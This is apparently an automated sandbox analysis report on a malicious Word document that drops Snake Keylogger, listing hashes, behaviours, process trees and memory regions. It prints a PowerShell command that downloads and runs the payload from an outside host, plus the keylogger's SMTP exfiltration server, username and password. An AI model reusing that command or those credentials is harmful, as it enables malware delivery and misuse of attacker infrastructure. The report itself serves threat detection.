Analysis
-
max time kernel
270s -
max time network
176s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
23-07-2021 14:01
Static task
static1
Behavioral task
behavioral1
Sample
Specifications_Details_202300_RFQ.doc
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Specifications_Details_202300_RFQ.doc
Resource
win10v20210410
General
-
Target
Specifications_Details_202300_RFQ.doc
-
Size
238KB
-
MD5
9efbd937ce6f8fef4ad85ee94d9cfd47
-
SHA1
d8eb24e90091238e2f6bd204ea67d54c5c4efdb6
-
SHA256
574ec668750302f0bb7634d757ce2436753a95d6f9610bc227e13abdecbfc6d5
-
SHA512
86e2b112d30a010096fca79fea0bdbd1c927a7548ea172f8e9d763bcca54216b836ae9edd960d9c844ebd862c48360d4c11ef86d6a3822ebd9e469c8ac3d694e
Malware Config
Extracted
http://easyviettravel.vn/vendor/seld/0A3/Specifications_Details_202300_RFQ.exe
Extracted
snakekeylogger
Protocol: smtp- Host:
netjul.xyz - Port:
587 - Username:
silyatwo@netjul.xyz - Password:
Q;QcczP{&6=~
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1456 1848 cmd.exe WINWORD.EXE -
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
twodark.exepid process 536 twodark.exe -
Loads dropped DLL 1 IoCs
Processes:
twodark.exepid process 1932 twodark.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
twodark.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\chrom = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\chrom\\chrom.exe\"" twodark.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 9 checkip.dyndns.org 14 freegeoip.app 15 freegeoip.app -
Suspicious use of SetThreadContext 1 IoCs
Processes:
twodark.exedescription pid process target process PID 1932 set thread context of 536 1932 twodark.exe twodark.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE -
Runs ping.exe 1 TTPs 4 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEpid process 2016 PING.EXE 1632 PING.EXE 1128 PING.EXE 1624 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1848 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exetwodark.exetwodark.exepid process 1680 powershell.exe 1680 powershell.exe 752 powershell.exe 752 powershell.exe 1356 powershell.exe 1356 powershell.exe 1372 powershell.exe 1372 powershell.exe 992 powershell.exe 992 powershell.exe 1932 twodark.exe 1932 twodark.exe 536 twodark.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exetwodark.exetwodark.exedescription pid process Token: SeDebugPrivilege 1680 powershell.exe Token: SeDebugPrivilege 752 powershell.exe Token: SeDebugPrivilege 1356 powershell.exe Token: SeDebugPrivilege 1372 powershell.exe Token: SeDebugPrivilege 992 powershell.exe Token: SeDebugPrivilege 1932 twodark.exe Token: SeDebugPrivilege 536 twodark.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1848 WINWORD.EXE 1848 WINWORD.EXE -
Suspicious use of WriteProcessMemory 57 IoCs
Processes:
WINWORD.EXEcmd.exepowershell.exetwodark.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process target process PID 1848 wrote to memory of 1456 1848 WINWORD.EXE cmd.exe PID 1848 wrote to memory of 1456 1848 WINWORD.EXE cmd.exe PID 1848 wrote to memory of 1456 1848 WINWORD.EXE cmd.exe PID 1848 wrote to memory of 1456 1848 WINWORD.EXE cmd.exe PID 1456 wrote to memory of 1680 1456 cmd.exe powershell.exe PID 1456 wrote to memory of 1680 1456 cmd.exe powershell.exe PID 1456 wrote to memory of 1680 1456 cmd.exe powershell.exe PID 1456 wrote to memory of 1680 1456 cmd.exe powershell.exe PID 1848 wrote to memory of 664 1848 WINWORD.EXE splwow64.exe PID 1848 wrote to memory of 664 1848 WINWORD.EXE splwow64.exe PID 1848 wrote to memory of 664 1848 WINWORD.EXE splwow64.exe PID 1848 wrote to memory of 664 1848 WINWORD.EXE splwow64.exe PID 1680 wrote to memory of 1932 1680 powershell.exe twodark.exe PID 1680 wrote to memory of 1932 1680 powershell.exe twodark.exe PID 1680 wrote to memory of 1932 1680 powershell.exe twodark.exe PID 1680 wrote to memory of 1932 1680 powershell.exe twodark.exe PID 1932 wrote to memory of 752 1932 twodark.exe powershell.exe PID 1932 wrote to memory of 752 1932 twodark.exe powershell.exe PID 1932 wrote to memory of 752 1932 twodark.exe powershell.exe PID 1932 wrote to memory of 752 1932 twodark.exe powershell.exe PID 752 wrote to memory of 2016 752 powershell.exe PING.EXE PID 752 wrote to memory of 2016 752 powershell.exe PING.EXE PID 752 wrote to memory of 2016 752 powershell.exe PING.EXE PID 752 wrote to memory of 2016 752 powershell.exe PING.EXE PID 1932 wrote to memory of 1356 1932 twodark.exe powershell.exe PID 1932 wrote to memory of 1356 1932 twodark.exe powershell.exe PID 1932 wrote to memory of 1356 1932 twodark.exe powershell.exe PID 1932 wrote to memory of 1356 1932 twodark.exe powershell.exe PID 1356 wrote to memory of 1632 1356 powershell.exe PING.EXE PID 1356 wrote to memory of 1632 1356 powershell.exe PING.EXE PID 1356 wrote to memory of 1632 1356 powershell.exe PING.EXE PID 1356 wrote to memory of 1632 1356 powershell.exe PING.EXE PID 1932 wrote to memory of 1372 1932 twodark.exe powershell.exe PID 1932 wrote to memory of 1372 1932 twodark.exe powershell.exe PID 1932 wrote to memory of 1372 1932 twodark.exe powershell.exe PID 1932 wrote to memory of 1372 1932 twodark.exe powershell.exe PID 1372 wrote to memory of 1128 1372 powershell.exe PING.EXE PID 1372 wrote to memory of 1128 1372 powershell.exe PING.EXE PID 1372 wrote to memory of 1128 1372 powershell.exe PING.EXE PID 1372 wrote to memory of 1128 1372 powershell.exe PING.EXE PID 1932 wrote to memory of 992 1932 twodark.exe powershell.exe PID 1932 wrote to memory of 992 1932 twodark.exe powershell.exe PID 1932 wrote to memory of 992 1932 twodark.exe powershell.exe PID 1932 wrote to memory of 992 1932 twodark.exe powershell.exe PID 992 wrote to memory of 1624 992 powershell.exe PING.EXE PID 992 wrote to memory of 1624 992 powershell.exe PING.EXE PID 992 wrote to memory of 1624 992 powershell.exe PING.EXE PID 992 wrote to memory of 1624 992 powershell.exe PING.EXE PID 1932 wrote to memory of 536 1932 twodark.exe twodark.exe PID 1932 wrote to memory of 536 1932 twodark.exe twodark.exe PID 1932 wrote to memory of 536 1932 twodark.exe twodark.exe PID 1932 wrote to memory of 536 1932 twodark.exe twodark.exe PID 1932 wrote to memory of 536 1932 twodark.exe twodark.exe PID 1932 wrote to memory of 536 1932 twodark.exe twodark.exe PID 1932 wrote to memory of 536 1932 twodark.exe twodark.exe PID 1932 wrote to memory of 536 1932 twodark.exe twodark.exe PID 1932 wrote to memory of 536 1932 twodark.exe twodark.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Specifications_Details_202300_RFQ.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Public\Documents\frontcheck.bat" "2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w h Start-BitsTransfer -Source htt`p://easyviettravel.vn/vendor/seld/0A3/Specifications_Details_202300_RFQ.exe -Destination C:\Users\Public\Documents\twodark.exe;C:\Users\Public\Documents\twodark.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Documents\twodark.exe"C:\Users\Public\Documents\twodark.exe"4⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXE"C:\Windows\system32\PING.EXE" gooogle.com6⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXE"C:\Windows\system32\PING.EXE" gooogle.com6⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXE"C:\Windows\system32\PING.EXE" gooogle.com6⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXE"C:\Windows\system32\PING.EXE" gooogle.com6⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\twodark.exeC:\Users\Admin\AppData\Local\Temp\twodark.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\twodark.exeMD5
288e4cbacba92f857bfd5cf62692606d
SHA121545f749883d4c24b41ef6fe670978acd424dc6
SHA2567f8a255d199da0a8ba9aff82cc66c1640bd33582fed396cd642502a5acb48233
SHA512654e18ede445e4b12df571ecdbc8cf2408e34e35da227f469eac6ee3ce31963309a1a68e18b1cb9f9f795d92d89461a86033508e4b99eac86bafee272993f3f1
-
C:\Users\Admin\AppData\Local\Temp\twodark.exeMD5
288e4cbacba92f857bfd5cf62692606d
SHA121545f749883d4c24b41ef6fe670978acd424dc6
SHA2567f8a255d199da0a8ba9aff82cc66c1640bd33582fed396cd642502a5acb48233
SHA512654e18ede445e4b12df571ecdbc8cf2408e34e35da227f469eac6ee3ce31963309a1a68e18b1cb9f9f795d92d89461a86033508e4b99eac86bafee272993f3f1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msMD5
e148f49e806e0ed96e2bb71a012e0ac1
SHA1e333aadf1d0ae51bd5abbdc652610e165bac08a0
SHA2562b73490f71c81ad0fdfc3123bc6e6743fb4b290105ad105ae91f8d0e53cf3790
SHA51227e3b5a5dbc9ad948fa7412b284fcc4d366593258a3a0c0f286d0fb0fcba40c4ef3de78e99480a0f6b5de6b1851c989740d1d96d1290e29354d5042588215f8a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msMD5
e148f49e806e0ed96e2bb71a012e0ac1
SHA1e333aadf1d0ae51bd5abbdc652610e165bac08a0
SHA2562b73490f71c81ad0fdfc3123bc6e6743fb4b290105ad105ae91f8d0e53cf3790
SHA51227e3b5a5dbc9ad948fa7412b284fcc4d366593258a3a0c0f286d0fb0fcba40c4ef3de78e99480a0f6b5de6b1851c989740d1d96d1290e29354d5042588215f8a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msMD5
e148f49e806e0ed96e2bb71a012e0ac1
SHA1e333aadf1d0ae51bd5abbdc652610e165bac08a0
SHA2562b73490f71c81ad0fdfc3123bc6e6743fb4b290105ad105ae91f8d0e53cf3790
SHA51227e3b5a5dbc9ad948fa7412b284fcc4d366593258a3a0c0f286d0fb0fcba40c4ef3de78e99480a0f6b5de6b1851c989740d1d96d1290e29354d5042588215f8a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msMD5
e148f49e806e0ed96e2bb71a012e0ac1
SHA1e333aadf1d0ae51bd5abbdc652610e165bac08a0
SHA2562b73490f71c81ad0fdfc3123bc6e6743fb4b290105ad105ae91f8d0e53cf3790
SHA51227e3b5a5dbc9ad948fa7412b284fcc4d366593258a3a0c0f286d0fb0fcba40c4ef3de78e99480a0f6b5de6b1851c989740d1d96d1290e29354d5042588215f8a
-
C:\Users\Public\Documents\frontcheck.batMD5
87ccb0ab85a10b4b9a47b2d0ef0f37c9
SHA1967fb3ca52c787d984e0e08a2675223c45f96644
SHA256a046e1c4e6ff5c4f5702cb4581042bae2c0633700fe5637e30b96adb0206bafd
SHA5124d1d4af7bdf3f7ef5dd734e3d41c6b9b67ea675f6587fa4d2dd0475f37b93b1226ae0aa26c9742e132d4b047272881c2f189cb19e82705c218e982d9bb520dc2
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Users\Admin\AppData\Local\Temp\twodark.exeMD5
288e4cbacba92f857bfd5cf62692606d
SHA121545f749883d4c24b41ef6fe670978acd424dc6
SHA2567f8a255d199da0a8ba9aff82cc66c1640bd33582fed396cd642502a5acb48233
SHA512654e18ede445e4b12df571ecdbc8cf2408e34e35da227f469eac6ee3ce31963309a1a68e18b1cb9f9f795d92d89461a86033508e4b99eac86bafee272993f3f1
-
memory/536-154-0x0000000000580000-0x0000000000581000-memory.dmpFilesize
4KB
-
memory/536-149-0x000000000041FFDE-mapping.dmp
-
memory/536-152-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/536-148-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/664-92-0x0000000000000000-mapping.dmp
-
memory/664-93-0x000007FEFBF71000-0x000007FEFBF73000-memory.dmpFilesize
8KB
-
memory/752-107-0x0000000005300000-0x0000000005301000-memory.dmpFilesize
4KB
-
memory/752-104-0x00000000025A0000-0x00000000025A1000-memory.dmpFilesize
4KB
-
memory/752-103-0x0000000004800000-0x0000000004801000-memory.dmpFilesize
4KB
-
memory/752-102-0x0000000000E80000-0x0000000000E81000-memory.dmpFilesize
4KB
-
memory/752-105-0x00000000047C0000-0x00000000047C1000-memory.dmpFilesize
4KB
-
memory/752-106-0x00000000047C2000-0x00000000047C3000-memory.dmpFilesize
4KB
-
memory/752-99-0x0000000000000000-mapping.dmp
-
memory/992-129-0x0000000000000000-mapping.dmp
-
memory/992-136-0x0000000002160000-0x0000000002DAA000-memory.dmpFilesize
12.3MB
-
memory/1128-128-0x0000000000000000-mapping.dmp
-
memory/1356-116-0x00000000049F2000-0x00000000049F3000-memory.dmpFilesize
4KB
-
memory/1356-114-0x0000000002590000-0x0000000002591000-memory.dmpFilesize
4KB
-
memory/1356-115-0x00000000049F0000-0x00000000049F1000-memory.dmpFilesize
4KB
-
memory/1356-109-0x0000000000000000-mapping.dmp
-
memory/1356-117-0x0000000004990000-0x0000000004991000-memory.dmpFilesize
4KB
-
memory/1356-112-0x0000000000DF0000-0x0000000000DF1000-memory.dmpFilesize
4KB
-
memory/1356-113-0x0000000004A30000-0x0000000004A31000-memory.dmpFilesize
4KB
-
memory/1372-126-0x00000000049F2000-0x00000000049F3000-memory.dmpFilesize
4KB
-
memory/1372-125-0x00000000049F0000-0x00000000049F1000-memory.dmpFilesize
4KB
-
memory/1372-119-0x0000000000000000-mapping.dmp
-
memory/1456-63-0x0000000000000000-mapping.dmp
-
memory/1624-138-0x0000000000000000-mapping.dmp
-
memory/1632-118-0x0000000000000000-mapping.dmp
-
memory/1680-68-0x0000000004920000-0x0000000004921000-memory.dmpFilesize
4KB
-
memory/1680-89-0x0000000006280000-0x0000000006281000-memory.dmpFilesize
4KB
-
memory/1680-72-0x0000000004850000-0x0000000004851000-memory.dmpFilesize
4KB
-
memory/1680-67-0x0000000002300000-0x0000000002301000-memory.dmpFilesize
4KB
-
memory/1680-75-0x00000000056C0000-0x00000000056C1000-memory.dmpFilesize
4KB
-
memory/1680-80-0x00000000060F0000-0x00000000060F1000-memory.dmpFilesize
4KB
-
memory/1680-71-0x0000000002580000-0x0000000002581000-memory.dmpFilesize
4KB
-
memory/1680-81-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB
-
memory/1680-82-0x0000000006190000-0x0000000006191000-memory.dmpFilesize
4KB
-
memory/1680-90-0x0000000005600000-0x0000000005601000-memory.dmpFilesize
4KB
-
memory/1680-65-0x0000000000000000-mapping.dmp
-
memory/1680-69-0x00000000048E0000-0x00000000048E1000-memory.dmpFilesize
4KB
-
memory/1680-70-0x00000000048E2000-0x00000000048E3000-memory.dmpFilesize
4KB
-
memory/1848-61-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1848-60-0x0000000070531000-0x0000000070533000-memory.dmpFilesize
8KB
-
memory/1848-59-0x0000000072AB1000-0x0000000072AB4000-memory.dmpFilesize
12KB
-
memory/1848-62-0x00000000757C1000-0x00000000757C3000-memory.dmpFilesize
8KB
-
memory/1848-146-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1932-139-0x0000000004890000-0x00000000048D9000-memory.dmpFilesize
292KB
-
memory/1932-145-0x00000000046E6000-0x00000000046E7000-memory.dmpFilesize
4KB
-
memory/1932-144-0x0000000007DC0000-0x0000000007E2E000-memory.dmpFilesize
440KB
-
memory/1932-97-0x00000000046D0000-0x00000000046D1000-memory.dmpFilesize
4KB
-
memory/1932-94-0x0000000000000000-mapping.dmp
-
memory/1932-95-0x0000000000110000-0x0000000000111000-memory.dmpFilesize
4KB
-
memory/1932-98-0x00000000046D5000-0x00000000046E6000-memory.dmpFilesize
68KB
-
memory/2016-108-0x0000000000000000-mapping.dmp